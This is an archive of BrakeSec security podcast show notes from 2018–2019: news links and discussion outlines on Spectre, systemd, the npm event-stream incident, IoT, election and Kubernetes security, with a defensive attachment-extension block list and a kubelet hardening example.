Published on: March 12, 2019
BrakeingDownIR show #10
GrumpySec appearance?
https://support.microsoft.com/en-us/help/4482887/windows-10-update-kb4482887
“Microsoft has added support for the /Qspectre flag to Visual C++ which currently enables some narrow compile-time static analysis to identify at-risk code sequences related to CVE-2017-5753 and insert speculation barrier instructions. This flag has been used to rebuild at-risk code in Windows and was released with our January 2018 security updates. It is important to note, however, that the Visual C++ compiler cannot guarantee complete coverage for CVE-2017-5753 which means instances of this vulnerability may still exist.”
Retpoline = “Return Trampoline”
“That’s because when using return operations, any associated speculative execution will 'bounce' endlessly.”
https://www.tomshardware.com/news/retpoline-patch-spectre-windows-10,37958.html
Cool site (Andrei) *long time podcast supporter*
UndertheWire.tech - powershell wargame
---
https://www.howtogeek.com/117192/how-to-run-powershell-commands-on-remote-computers/
https://blogs.technet.microsoft.com/askperf/2012/02/17/useful-wmic-queries/
Caveats:
Network connection you’re on must be set to “private”, not public
WinRM service has to be enabled on both the local and remote hosts (at least, I think so --brbr)
https://www.engadget.com/2019/02/27/dow-jones-watchlist-leaked/
http://time.com/5349896/23andme-glaxo-smith-kline/
https://int3.cc/products/facedancer21 - USB
Published on: March 4, 2019
Bsides Seattle recap (Bryan)
New phishing technique to bypass email filters-
https://www.helpnetsecurity.com/2019/02/20/phishers-new-trick-for-bypassing-email-url-filters/
https://en.wikipedia.org/wiki/Office_Open_XML_file_formats#Relationships
Use after free in Linux kernel:
https://www.webopedia.com/TERM/U/use-after-free.html
https://cwe.mitre.org/data/definitions/416.html
https://www.acodersjourney.com/top-20-c-pointer-mistakes/
https://www.kernel.org/doc/html/v4.14/dev-tools/kasan.html
https://nvd.nist.gov/vuln/detail/CVE-2019-8912
Published on: February 25, 2019
https://www.zdnet.com/article/google-working-on-new-chrome-security-feature-to-obliterate-dom-xss/
https://www.owasp.org/index.php/DOM_Based_XSS
CSRF - confused deputy https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
Google Cloud Platform - tip tricks, stuff ms. berlin learned
Layer 8 conference - Rhode Island
I was wrong…..cycles don’t sync --Ms. Berlin https://health.clevelandclinic.org/myth-truth-period-really-sync-close-friends/
Published on: February 18, 2019
SpecterOps Class: https://www.eventbrite.com/e/adversary-tactics-red-team-operations-training-course-boston-june-2019-tickets-54970050902
https://www.secjuice.com/security-researcher-assaulted-ice-atrient/
Tweet of application teardown: https://twitter.com/duniel_pls/status/1093565709630824448
https://www.zdnet.com/article/linux-kernel-gets-another-option-to-disable-spectre-mitigations/
https://capsule8.com/blog/exploiting-systemd-journald-part-1/
Segue from systemd/journald into:
“Super daemon for all daemons”
Replaced things like sysvinit, rc.d, and even inetd
Lennart Poettering and Kay Sievers
Systemd (PID1)
Configured using only text files
.service
.device
.swap
.timer (a .service unit of the same name must exist, unless the timer's Unit= key names a different one)
‘Transient timers can be created’
https://wiki.archlinux.org/index.php/Systemd/Timers
/etc/systemd/system/foo.timer
[Unit]
Description=Run foo weekly and on boot
[Timer]
OnBootSec=15min
OnUnitActiveSec=1w
[Install]
WantedBy=timers.target
Logs are in binary format
Cgroups - control groups
Isolates resource usage (CPU, memory, disk I/O, network, etc) of processes
Bound by the same criteria
Used a lot of places (hadoop, k8s, docker, LXC)
http://without-systemd.org/wiki/index.php/Arguments_against_systemd
https://www.freedesktop.org/wiki/Software/systemd/TipsAndTricks/
https://lwn.net/SubscriberLink/777595/a71362cc65b1c271/
http://0pointer.de/blog/projects/systemd.html
https://en.wikipedia.org/wiki/Systemd
Published on: February 11, 2019
Facetime bug update: https://www.cnbc.com/2019/02/01/apple-facetime-bug-fix-and-apology.html
ShmooCon discussion
Bsides Leeds discussion
@largeCardinal
@bsidesLeeds
https://www.bbc.co.uk/news/uk-scotland-edinburgh-east-fife-47028244
https://www.theverge.com/2018/12/28/18159110/centurylink-internet-911-outage-fcc-investigating
Published on: February 4, 2019
BIO:
Liz Rice is the Technology Evangelist with container security specialists Aqua Security, where she also works on container-related open source projects including kube-hunter and kube-bench. She was Co-Chair of the CNCF’s KubeCon + CloudNativeCon 2018 events in Copenhagen, Shanghai and Seattle, and co-author of the O’Reilly Kubernetes Security book. She has a wealth of software development, team, and product management experience from working on network protocols and distributed systems, and in digital technology sectors such as VOD, music, and VoIP. When not building startups and writing code, Liz loves riding bikes in places with better weather than her native London.
Liz Rice (@lizrice on Twitter) https://www.lizrice.com/
https://medium.com/@lizrice/non-privileged-containers-based-on-the-scratch-image-a80105d6d341
https://www.cloudops.com/2018/10/takeaways-from-liz-rice-pop-up-meetup-on-container-security/
https://thenewstack.io/cloud-native-security-patching-with-devops-best-practices/
https://changelog.com/gotime/56 - podcast with Liz
https://kubernetes-security.info - co-author of O’Reilly Kubernetes security book
https://www.slideshare.net/Docker/dont-have-a-meltdown - Liz Rice/Justin Cormack slides
https://www.bbc.com/news/technology-41753022 - NHS ransomware issue in 2017
https://docs.docker.com/config/containers/container-networking/ - docker portmapping
https://techbeacon.com/9-practical-steps-secure-your-container-deployment
If security needs to “Shift Left”, what can devs do to accommodate the change?
Everyone will have to make adjustments, not just security… right?
Reverse uptime…
Forgotten data?
Test Driven Development
Why do we need security as far left?
“We don’t patch, we just push a fix, ”
“We’ll fix it in production…”
Or we pump more resources to overcome perf issues
Is there time for code reviews?
“We don’t need change management…”
https://testssl.sh - @drwetter
Automation: How does that solve security issues?
Do Microservices solve everything?
What don’t they solve?
What does security need to embrace to make the shift less painful?
What does development need to embrace to make the shift less painful?
Cause security wants to get in there…
There are already DevSecOps processes a-plenty and many . Why aren’t companies adopting them?
Maturity?
Lack of resources?
Negligent devs - how can you ignore the news of breaches?
Setting Goals
“Start Small” - what’s an example of a small goal?
Published on: January 28, 2019
intro
CFP for Bsides Barcelona is open! https://bsides.barcelona
Aaron Guzman: @scriptingxss
https://www.computerweekly.com/news/252443777/Global-IoT-security-standard-remains-elusive
https://www.owasp.org/index.php/IoT_Attack_Surface_Areas
OWASP SLACK: https://owasp.slack.com/
https://www.owasp.org/images/7/79/OWASP_2018_IoT_Top10_Final.jpg
Team of 10 or so… list of “do’s and don’ts”
Sub-projects? Embedded systems, car hacking
Embedded applications best practices? *potential show*
Standards: https://xkcd.com/927/
CCPA: https://en.wikipedia.org/wiki/California_Consumer_Privacy_Act
California SB-327: https://leginfo.legislature.ca.gov/faces/billNavClient.xhtml?bill_id=201720180SB327
How did you decide on the initial criteria?
2014 OWASP IoT list: https://www.owasp.org/index.php/Top_10_IoT_Vulnerabilities_(2014)
2014 list:
BrakeSec Episode on ASVS http://traffic.libsyn.com/brakeingsecurity/2015-046_ASVS_with_Bill_Sempf.mp3
OWASP SLACK: https://owasp.slack.com/
What didn’t make the list? How do we get Devs onboard with these?
How does someone interested get involved with the OWASP IoT working group?
https://docs.microsoft.com/en-us/azure/iot-fundamentals/iot-security-best-practices
https://www.iiconsortium.org/pdf/SMM_Description_and_Intended_Use_2018-04-09.pdf
https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf
Published on: January 22, 2019
Aaron Guzman: @scriptingxss
https://www.computerweekly.com/news/252443777/Global-IoT-security-standard-remains-elusive
https://www.owasp.org/index.php/IoT_Attack_Surface_Areas
OWASP SLACK: https://owasp.slack.com/
https://www.owasp.org/images/7/79/OWASP_2018_IoT_Top10_Final.jpg
Team of 10 or so… list of “do’s and don’ts”
Sub-projects? Embedded systems, car hacking
Embedded applications best practices? *potential show*
Standards: https://xkcd.com/927/
CCPA: https://en.wikipedia.org/wiki/California_Consumer_Privacy_Act
California SB-327: https://leginfo.legislature.ca.gov/faces/billNavClient.xhtml?bill_id=201720180SB327
How did you decide on the initial criteria?
2014 OWASP IoT list: https://www.owasp.org/index.php/Top_10_IoT_Vulnerabilities_(2014)
2014 list:
BrakeSec Episode on ASVS http://traffic.libsyn.com/brakeingsecurity/2015-046_ASVS_with_Bill_Sempf.mp3
OWASP SLACK: https://owasp.slack.com/
What didn’t make the list? How do we get Devs onboard with these?
How does someone interested get involved with the OWASP IoT working group?
https://docs.microsoft.com/en-us/azure/iot-fundamentals/iot-security-best-practices
https://www.iiconsortium.org/pdf/SMM_Description_and_Intended_Use_2018-04-09.pdf
https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf
Published on: January 14, 2019
Join the combined forces of:
Jerry Bell (@maliciousLink) from Defensive Security Podcast! (https://defensivesecurity.org/)
Bill Gardner from the "RebootIt! podcast"
https://itunes.apple.com/us/podcast/reboot-it/id1256466198?mt=2
Ms. Berlin and Bryan Brake for the end of the year podcast!
BrakeSec Podcast = www.brakeingsecurity.com
RSS: https://www.brakeingsecurity.com/rss
Published on: December 27, 2018
Mike Samuels
https://github.com/mikesamuel/attack-review-testbed
https://nodejs-security-wg.slack.com/
Hardening NodeJS
Speaking engagement talks:
A Node.js Security Roadmap at JSConf.eu - https://www.youtube.com/watch?v=1Gun2lRb5Gw
Improving Security by Improving the Framework @ Node Summit - https://vimeo.com/287516009
Achieving Secure Software through Redesign at Nordic.js - https://www.facebook.com/nordicjs/videos/232944327398936/?t=1781
What is a package: (holy hell, why is this so complicated?)
A package is any of:
https://medium.com/@jsoverson/exploiting-developer-infrastructure-is-insanely-easy-9849937e81d4
https://blog.risingstack.com/node-js-security-checklist/
https://www.npmjs.com/package/trusted-types
https://github.com/WICG/trusted-types/issues/31
Published on: December 18, 2018
Adam Baldwin (@adam_baldwin)
Director of Security, npm
https://foundation.nodejs.org/
https://spring.io/understanding/javascript-package-managers
Role in the NodeJS project
Advisory? Active role? Maintain security modules?
Are there any requirements to being a dev?
Are there different roles in the NodeJS environment?
Is there any review of system sensitive packages? (or has that ship sailed…)
Discussion of timeline from NodeJS security team
When were you notified? (or were you notified at all?)
What steps were taken to fix the issue?
Lessons learned?
Official npm security policy: https://www.npmjs.com/policies/security (good stuff!)
Event-stream (initial bug report): https://github.com/dominictarr/event-stream/issues/116
Only affected bitcoin Wallets from ‘Copay’
“Cue relief, mixed with frustration, for anyone not targeted. Developer Chris Northwood wrote: ‘We’ve wiped our brows as we’ve got away with it, we didn’t have malicious code running on our dev machines, our CI servers, or in prod. This time.’”
https://medium.com/@jsoverson/exploiting-developer-infrastructure-is-insanely-easy-9849937e81d4
“The damage this could have caused is incredible to think about. The projects that depend on this aren’t trivial either, Microsoft’s original Azure CLI depends on event-stream! Think of the systems that either develop that tool or run that tool. Each one of those potentially had this malicious code installed.”
https://thehackernews.com/2018/11/nodejs-event-stream-module.html
“The malicious code detected earlier this week was added to Event-Stream version 3.3.6, published on September 9 via NPM repository, and had since been downloaded by nearly 8 million application programmers.”
https://www.analyticsvidhya.com/blog/2018/07/using-power-deep-learning-cyber-security/
Hacker News (with comments): https://news.ycombinator.com/item?id=18534392
Official npm blog post: https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident
https://blog.npmjs.org/post/175824896885/incident-report-npm-inc-operations-incident-of
2017 package/user stats: https://www.linux.com/news/event/Nodejs/2016/state-union-npm
According to npmjs.org: over 800,000 packages (854,000 packages, 7 million+ individual versions)
Dependency hell in NodeJS:
https://blog.risingstack.com/controlling-node-js-security-risk-npm-dependencies/
“Roughly 76% of Node shops use vulnerable packages, some of which are extremely severe; and open source projects regularly grow stale, neglecting to fix security flaws.”
History of NodeJS security issues:
ESLINT: https://nodesource.com/blog/a-high-level-post-mortem-of-the-eslint-scope-security-incident/
Left-pad: https://www.theregister.co.uk/2016/03/23/npm_left_pad_chaos/
How to ensure this type of issue doesn’t happen again? (or is that possible, considering the ecosystem?)
What can devs, blueteams, or companies that live and die by NodeJS do to increase security, or assist in making NPM Security team’s job easier?
What is the responsibility of consumers of open source?
What can be done to ensure vetting for ‘important’ packages?
Can someone manage turnover? (or has that ship sailed?)
Security scanners:
https://geekflare.com/nodejs-security-scanner/
https://techbeacon.com/13-tools-checking-security-risk-open-source-dependencies-0
Threat assessment or ‘what could go wrong in the future’?
Bad code
“Trust issues”
Repo corruption
Hijacking packages
Keep up to date on NodeJS security issues:
https://nodejs.org/en/security/
https://groups.google.com/forum/#!forum/nodejs-sec
^ this is great for Node itself, but what if you want to stay up to date with security advisories across the package ecosystem?
npmjs.com/advisories or @npmjs on twitter
https://rubysec.com/ -Ruby security group
Published on: December 11, 2018
Where in the world is Ms. Amanda Berlin?
Keynoting hackerconWV
Election Security
Cuyahoga County:
Intro: Jeremy Mio (@cyborg00101)
Name?
Why are you here?
Discussing how Ohio does election operations.
Walk through the process
Pre-Elections
Elections Night
Post Elections
All about the C.I.A.
Votes must be confidential
Votes must not be compromised (integrity)
Voting should be available and without outage
Did a tabletop exercise with all counties in Ohio (impressive!)
Gamified, using role-reversal
Points based system
Different technology has different point values
Physical security/chain of custody
Retention
EI-ISAC - election infra ISAC
https://www.cisecurity.org/services/albert/ - Albert system
https://www.cisecurity.org/best-practices-part-1/ - election security best practices
How does the Ohio election process stack up against other states?
Media Perception in Elections Hacking and threats
11 year olds ‘hacking election’
Yes, good for a news article title
Goes to show how easy it is to actually hack systems
Train someone on SQLI, pwn the things
Elections Security Operations and Preparation
Technology types
Ballot
Booths
Mail-in ballots
Securing election infra
What can be done to make it more secure?
Published on: December 3, 2018
@IanColdwater https://www.redteamsecure.com/ *new gig*
So many different moving parts
Plugins
Code
Hardware
She’s working on speaking schedule for 2019
How would I use these at home?
https://kubernetes.io/docs/setup/minikube/
Kubernetes - up and running
https://www.amazon.com/Kubernetes-Running-Dive-Future-Infrastructure/dp/1491935677
General wikipedia article (with architecture diagram): https://en.wikipedia.org/wiki/Kubernetes
https://twitter.com/alicegoldfuss - Alice Goldfuss
Derbycon Talk: http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-10-perfect-storm-taking-the-helm-of-kubernetes-ian-coldwater
Tesla mis-configured Kubes env:
From the talk: https://arstechnica.com/information-technology/2018/02/tesla-cloud-resources-are-hacked-to-run-cryptocurrency-mining-malware/
Redlock report mentioned in Ars article: https://redlock.io/blog/cryptojacking-tesla
Setup your own K8s environment: https://kubernetes.io/docs/setup/pick-right-solution/#local-machine-solutions (many options to choose from)
Securing K8s implementations: https://kubernetes.io/docs/tasks/administer-cluster/securing-a-cluster/
https://github.com/aquasecurity/kube-hunter -
Threat Model
What R U protecting?
Who R U protecting from?
What R your Adversary’s capabilities?
What R your capabilities?
Defenders think in Lists
Attackers think in Graphs
What are some of the visible ports used in K8S?
44134/tcp - Helm Tiller, Weave, Calico
10250/tcp - kubelet (kubelet exploit)
No authN, completely open
10255/tcp - kubelet read-only port
4194/tcp - cAdvisor
2379/tcp - etcd
Etcd holds all the configs
Config storage
Engineering workflow:
Ephemeral -
CVE for K8S subpath - https://kubernetes.io/blog/2018/04/04/fixing-subpath-volume-vulnerability/
Final points:
Advice securing K8S is standard security advice
Use Defense in Depth, and least Privilege
Be aware of your attack surface
Keep your threat model in mind
David Cybuck (questions from Slack channel)
My questions are: 1. Talk telemetry? What is the best first step for having my containers or kubernetes report information? (my overlords want metrics dashboards which lead to useful metrics).
Jarrod Frates
Inguardians
@jarrodfrates
“Skittering Through Networks”
Ms. Berlin in Germany - How’d it go?
TinkerSec’s story: https://threadreaderapp.com/thread/1063423110513418240.html
Takeaways
Blue Team:
- Least Privilege Model
- Least Access Model
“limited remote access to only a small number of IT personnel”
“This user didn't need Citrix, so her Citrix linked to NOTHING”
“They limited access EVEN TO LOCAL ADMINS!”
- Multi-Factor Authentication
- Simple Anomaly Rule Fires
“Finance doesn’t use Powershell”
- Defense in Depth
“moving from passwords to pass phrases…”
“Improper disposal of information assets”
Red Team:
- Keep Trying
- Never Assume
- Bring In Help
- Luck Favors the Prepared
- Adapt and Overcome
Before the Test
During the Test
After the Test
Ms. Berlin’s Legit business - Mental Health Hackers
CFP for Bsides Seattle (Deadline: 26 November 2018) http://www.securitybsides.com/w/page/129078930/BsidesSeattle2019
CFP for BsidesNash https://twitter.com/bsidesnash/status/1063084215749787649 Closes Dec 31
Teaching a class in Seattle for SANS (SEC504) - need some students! Reach out to me for more information. Looking to do this at the end of February through March
Published on: November 19, 2018
Ian Coldwater -
@IanColdwater https://www.redteamsecure.com/ *new gig*
So many different moving parts
Plugins
Code
Hardware
She’s working on speaking schedule for 2019
How would I use these at home?
https://kubernetes.io/docs/setup/minikube/
Kubernetes - up and running
https://www.amazon.com/Kubernetes-Running-Dive-Future-Infrastructure/dp/1491935677
General wikipedia article (with architecture diagram): https://en.wikipedia.org/wiki/Kubernetes
https://twitter.com/alicegoldfuss - Alice Goldfuss
Derbycon Talk: http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-10-perfect-storm-taking-the-helm-of-kubernetes-ian-coldwater
Tesla mis-configured Kubes env:
From the talk: https://arstechnica.com/information-technology/2018/02/tesla-cloud-resources-are-hacked-to-run-cryptocurrency-mining-malware/
Redlock report mentioned in Ars article: https://redlock.io/blog/cryptojacking-tesla
Setup your own K8s environment: https://kubernetes.io/docs/setup/pick-right-solution/#local-machine-solutions (many options to choose from)
Securing K8s implementations: https://kubernetes.io/docs/tasks/administer-cluster/securing-a-cluster/
https://github.com/aquasecurity/kube-hunter -
Threat Model
What R U protecting?
Who R U protecting from?
What R your Adversary’s capabilities?
What R your capabilities?
Defenders think in Lists
Attackers think in Graphs
What are some of the visible ports used in K8S?
44134/tcp - Helm Tiller, Weave, Calico
10250/tcp - kubelet (kubelet exploit)
No authN, completely open
10255/tcp - kubelet read-only port
4194/tcp - cAdvisor
2379/tcp - etcd
Etcd holds all the configs
Config storage
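The kubelet port notes above (10250 with no authN, 10255 read-only), in both copies of these show notes, describe the weak default. As an added example, not from the episode or from the Kubernetes docs linked here, this KubeletConfiguration fragment shows the open setting beside the hardened one; the CA file path is an assumption and should be replaced with the cluster's own:

```yaml
# Added example: weak kubelet settings beside hardened ones (not from the episode).
# --- Weak: anonymous callers accepted, every request authorized, read-only port exposed ---
apiVersion: kubelet.config.k8s.io/v1beta1
kind: KubeletConfiguration
authentication:
  anonymous:
    enabled: true          # unauthenticated requests to 10250 are accepted
authorization:
  mode: AlwaysAllow        # no authorization check on any request
readOnlyPort: 10255        # unauthenticated read-only API on 10255
---
# --- Hardened: reject anonymous callers, delegate authZ to the API server, close 10255 ---
apiVersion: kubelet.config.k8s.io/v1beta1
kind: KubeletConfiguration
authentication:
  anonymous:
    enabled: false         # unauthenticated requests get 401
  webhook:
    enabled: true          # bearer tokens checked against the API server (TokenReview)
  x509:
    clientCAFile: /etc/kubernetes/pki/ca.crt   # assumed path: CA that signed API-server client certs
authorization:
  mode: Webhook            # each request checked against the API server (SubjectAccessReview)
readOnlyPort: 0            # disable the read-only port entirely
```

The kubelet reads this file through its `--config` flag. After applying the hardened settings, an unauthenticated request to port 10250 should be rejected with 401 and nothing should be listening on 10255; the API server still reaches the kubelet because it presents a client certificate signed by the CA named in `clientCAFile`.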
Engineering workflow:
Ephemeral -
CVE for K8S subpath - https://kubernetes.io/blog/2018/04/04/fixing-subpath-volume-vulnerability/
Final points:
Advice securing K8S is standard security advice
Use Defense in Depth, and least Privilege
Be aware of your attack surface
Keep your threat model in mind
David Cybuck (questions from Slack channel)
My questions are: 1. Talk telemetry? What is the best first step for having my containers or kubernetes report information? (my overlords want metrics dashboards which lead to useful metrics).
Published on: November 12, 2018
@InfoSecSherpa
I have two talks coming up:
*Shameless Plug* My Nuzzel newsletters
https://nuzzel.com/InfoSecSherpa
https://nuzzel.com/InfoSecSherpa/cybersecurity-africa
News stories -
Biglaw Firm Hit With Cybersecurity Incident Earlier This Month (Published: 29 October 2018 | Source: Above the Law)
Porn-Watching Employee Infected Government Networks With Russian Malware, IG Says (Published: 25 October 2018 | Source: Next Gov)
Published on: November 5, 2018
Health & Tech?
https://hackaday.io/project/151388-minder (774 results for “health” on hackaday)
(def don’t need to talk about, but still funny AF) https://hackaday.io/project/11407-myflow
https://9to5mac.com/2017/12/15/apple-watch-saves-life-managing-heart-attack/
Privacy implications?
Microsoft healthcare initiative - https://enterprise.microsoft.com/en-us/industries/health/
Apple health - https://www.apple.com/ios/health/ - https://www.apple.com/researchkit/
https://www.papercall.io/dachfest18
Make plans for next year! Follow @derbycon on Twitter!
Published on: October 22, 2018
Derbycon is probably one of the best infosec conferences of the calendar year. The podcast always has so much fun meeting listeners, meeting new people, and getting some audio to share with folks who can't be there.
This year, we still got some audio, and it's great. We talked with Cheryl Biswas (@3ncr1pt3d) about her talks at #Derbycon and her work with the #dianaInitiative. Check out her talks at the links on @irongeek's website...
Cheryl's Track talk: http://www.irongeek.com/i.php?page=videos/derbycon8/track-1-05-draw-a-bigger-circle-infosec-evolves-cheryl-biswas
Cheryl's Stable talk: http://www.irongeek.com/i.php?page=videos/derbycon8/stable-29-patching-show-me-where-it-hurts-cheryl-biswas
I saw Tomasz near the @log-md booth, it was his first Derbycon, and I was interested in hearing what he had to say about hypervisor introspection...
Make plans for next year! Follow @derbycon on Twitter!
Published on: October 15, 2018
Pizza Party Link -
https://www.eventbrite.com/e/brakesec-derbycon-pizza-meetup-tickets-50719385046
News stories-
Software/library bloat
http://tonsky.me/blog/disenchantment/
https://hackernoon.com/how-it-feels-to-learn-javascript-in-2016-d3a717dd577f
https://hackerhurricane.blogspot.com/2016/09/avoiding-ransomware-with-built-in-basic.html
https://www.zdnet.com/article/windows-utility-used-by-malware-in-new-information-theft-campaigns/
https://attack.mitre.org/wiki/Technique/T1170 - HTA file malware examples
https://nakedsecurity.sophos.com/2018/09/26/finally-a-fix-for-the-encrypted-webs-achilles-heel/
https://www.bbc.com/news/technology-45686890 - (Facebook account hack)
https://github.com/eset/malware-ioc/blob/master/sednit/lojax.adoc - IOCs from various malware
UEFI rootkit - https://www.bleepingcomputer.com/news/security/apt28-uses-lojax-first-uefi-rootkit-seen-in-the-wild/
Block These Extensions:
File Extension File Type
.adp Access Project (Microsoft)
.app Executable Application
.asp Active Server Page
.bas BASIC Source Code
.bat Batch Processing
.cer Internet Security Certificate File
.chm Compiled HTML Help
.cmd DOS CP/M Command File, Command File for Windows NT
.cnt Help file index
.com Command
.cpl Windows Control Panel Extension(Microsoft)
.crt Certificate File
.csh csh Script
.der DER Encoded X509 Certificate File
.exe Executable File
.fxp FoxPro Compiled Source (Microsoft)
.gadget Windows Vista gadget
.hlp Windows Help File
.hpj Project file used to create Windows Help File
.hta Hypertext Application
.inf Information or Setup File
.ins IIS Internet Communications Settings (Microsoft)
.isp IIS Internet Service Provider Settings (Microsoft)
.its Internet Document Set, Internet Translation
.js JavaScript Source Code
.jse JScript Encoded Script File
.ksh UNIX Shell Script
.lnk Windows Shortcut File
.mad Access Module Shortcut (Microsoft)
.maf Access (Microsoft)
.mag Access Diagram Shortcut (Microsoft)
.mam Access Macro Shortcut (Microsoft)
.maq Access Query Shortcut (Microsoft)
.mar Access Report Shortcut (Microsoft)
.mas Access Stored Procedures (Microsoft)
.mat Access Table Shortcut (Microsoft)
.mau Media Attachment Unit
.mav Access View Shortcut (Microsoft)
.maw Access Data Access Page (Microsoft)
.mda Access Add-in (Microsoft), MDA Access 2 Workgroup (Microsoft)
.mdb Access Application (Microsoft), MDB Access Database (Microsoft)
.mde Access MDE Database File (Microsoft)
.mdt Access Add-in Data (Microsoft)
.mdw Access Workgroup Information (Microsoft)
.mdz Access Wizard Template (Microsoft)
.msc Microsoft Management Console Snap-in Control File (Microsoft)
.msh Microsoft Shell
.msh1 Microsoft Shell
.msh2 Microsoft Shell
.mshxml Microsoft Shell
.msh1xml Microsoft Shell
.msh2xml Microsoft Shell
.msi Windows Installer File (Microsoft)
.msp Windows Installer Update
.mst Windows SDK Setup Transform Script
.ops Office Profile Settings File
.osd Application virtualized with Microsoft SoftGrid Sequencer
.pcd Visual Test (Microsoft)
.pif Windows Program Information File (Microsoft)
.plg Developer Studio Build Log
.prf Windows System File
.prg Program File
.pst MS Exchange Address Book File, Outlook Personal Folder File (Microsoft)
.reg Registration Information/Key for W95/98, Registry Data File
.scf Windows Explorer Command
.scr Windows Screen Saver
.sct Windows Script Component, Foxpro Screen (Microsoft)
.shb Windows Shortcut into a Document
.shs Shell Scrap Object File
.ps1 Windows PowerShell
.ps1xml Windows PowerShell
.ps2 Windows PowerShell
.ps2xml Windows PowerShell
.psc1 Windows PowerShell
.psc2 Windows PowerShell
.tmp Temporary File/Folder
.url Internet Location
.vb VBScript File or Any VisualBasic Source
.vbe VBScript Encoded Script File
.vbp Visual Basic project file
.vbs VBScript Script File, Visual Basic for Applications Script
.vsmacros Visual Studio .NET Binary-based Macro Project (Microsoft)
.vsw Visio Workspace File (Microsoft)
.ws Windows Script File
.wsc Windows Script Component
.wsf Windows Script File
.wsh Windows Script Host Settings File
.xnk Exchange Public Folder Shortcut
.ade ADC Audio File
.cla Java class File
.class Java class File
.grp Microsoft Windows Program Group
.jar Compressed archive file package for Java classes and data
.mcf MMS Composer File
.ocx ActiveX Control file
.pl Perl script language source code
.xbap Silverlight Application Package
------------------------------
Published on: October 1, 2018
Interesting email from one of our listeners, detailing an issue that came up on a client engagement. We walk through the best ways to store information post-engagement, and what you need to do to document test procedures so you don't get bitten by a potential issue perhaps months down the line.
Published on: September 25, 2018
We are back with a new episode this week! We go over our solutions for some of the #derbyCon ticket #CTF challenges and include links to some of the challenges. We talk about Windows Event Forwarding, and all log forwarders seem to be losing events!
Thanks to our Patrons!
Gonna be at Derbycon, come see us!
Congrats to our Derbycon Ticket CTF winners!
Winner: @gigstaggart
2nd Place: @ohai_ninja
3rd Place: @SoDakHib
Mr. Boettcher’s Challenge (SuperCrypto): https://drive.google.com/open?id=1657hBxRbacJRw0svG1nwzZImON3QFn1t
Ms.Berlin’s Challenge:
potato.file https://drive.google.com/open?id=1Mit7060ipK_JgDDF7sYG3XbMpZ9wyaFN
Taters.zip https://drive.google.com/open?id=1TnA16EiwLw2BberHXct8JpEsntT-GWq7
Potatoes.pcapng: https://drive.google.com/open?id=1_IATBw4OGAc7lUc7NXTcucfwU9NAROYN
Mr. Brake’s Challenge: https://drive.google.com/open?id=1gwGkLjWEZ42NlWiw2Eg8IQnnQAxua7B8
Update on Mental Health GoFundMe: http://www.derbycon.com/wellness
Thanks to the #Derbycon organizers for their time and patience on answering the questions posed.
Missing event issues:
https://github.com/palantir/windows-event-forwarding
https://answers.splunk.com/answers/337939/how-to-troubleshoot-why-im-missing-events-in-my-se.html
https://www.solarwinds.com/free-tools/event-log-forwarder-for-windows
https://hackernoon.com/the-windows-event-forwarding-survival-guide-2010db7a68c4
https://4sysops.com/archives/windows-event-forwarding-to-a-sql-database/
https://blogs.technet.microsoft.com/jepayne/2017/12/08/weffles/
http://bpatty.rocks/blue_team/weffles.html
Some issues with missing events… Everyone is affected by this!
WEF & PowerBI is good for small installations.
Any GPOs involved?
Can it be done on a server by server basis?
Can an attacker simply disable the service once initial access is achieved?
Pros and Cons of feeding the WEF output to a MapReduce system?
Not sure if they've used it, but WEF vs. winlogbeat vs. NxLog?
Need a config? Get some examples here for nxlog, winlogbeat, filebeat, Windows Logging Service and other stuff...
https://www.malwarearchaeology.com/logging/
Published on: September 1, 2018
CTF information:
Official site: https://scoreboard.totallylegitsite.com (thanks Matt Domko (@hashtagcyber) for hosting and allowing us to use his employee discount!)
Please do not pentest the environment, DDoS it, or cause anything undesirable to happen to the site.
View the page, submit the flags, leave everything else alone...
Derbycon Auction - starts September 8th at 9am Pacific Time
Slack only -
Opening bid is $175
Increments of $25 only
100% goes to Chris Sanders’ “Rural Technology Fund”
https://ruraltechfund.org/donate/
Amanda’s mental health workshop - AWESOME! http://www.derbycon.com/wellness/
https://www.gofundme.com/derbycon-mental-health-amp-wellbeing
Mandy Logan - hacking her way out of a coma! https://www.gofundme.com/hacking-recovery-brainstem-stroke
https://www.tomsguide.com/us/tmobile-breach-2018,news-27876.html
https://art-of-lockpicking.com/single-pin-picking-skills/
Lockpicking - Mr. Boettcher discusses (I have thoughts too --brbr)
Tools:
Parts of lock:
Sites:
Mr. Boettcher introducing JGOR audio (@indiecom) totally not @jwgoerlich
Btw: https://www.flickr.com/photos/36152409@N00/sets/72157700237001915/
https://www.trustedsec.com/2018/08/tech-support-scams-are-a-concern-for-all/
https://twitter.com/InfoSystir/status/1032343381328973827
Published on: August 26, 2018
Post-Hacker Summercamp
IppSec Walkthroughs
Brakesec Derbycon ticket CTF -
Drama - (hotel room search gate)
AirconditionerGate
Personal privacy
Ask for ID
Call the front desk
Use the deadbolt - can be bypassed
Plug the peephole with TP
Hotel rooms aren’t secure (neither are the safes)
Probably the most hostile environment infosec people go into to try and be secure/private
https://www.informationsecuritybuzz.com/expert-comments/over-146-billion-records/
Based on study by Juniper Research
Published on: August 17, 2018
HTTPS on www.brakeingsecurity.com, Libsyn RSS syncing of iTunes/Google Play is over TLS
Amanda giving a talk at Diana Initiative
Derbycon Talk - mental health
Volunteer/Topic request form - https://goo.gl/forms/wAiLW5Dh5h0MR5bO2
http://www.hexacorn.com/blog/2018/07/29/beyond-good-ol-run-key-part-82/
https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/tracelo
Published on: August 9, 2018
Godfrey Daniels - author of "Adventures with the Mojave Phone Booth" on sale at mojavephoneboothbook.com
https://en.wikipedia.org/wiki/Mojave_phone_booth
https://www.tripsavvy.com/the-mojave-phone-booth-1474047
https://www.dailydot.com/debug/mojave-phone-booth-back-number/
https://www.npr.org/2014/08/22/342430204/the-mojave-phone-booth
https://twitter.com/mojavefonebooth
https://www.theatlantic.com/technology/archive/2017/02/object-lesson-phone-booth/515385/
http://deathvalleyjim.com/cima-cinder-mine-mojave-national-preserve/
https://twitter.com/_noid_?lang=en
http://www.mojavephonebooth.com/ - movie based on the phone booth itself, not the book
Published on: August 1, 2018
Stories and topics we covered:
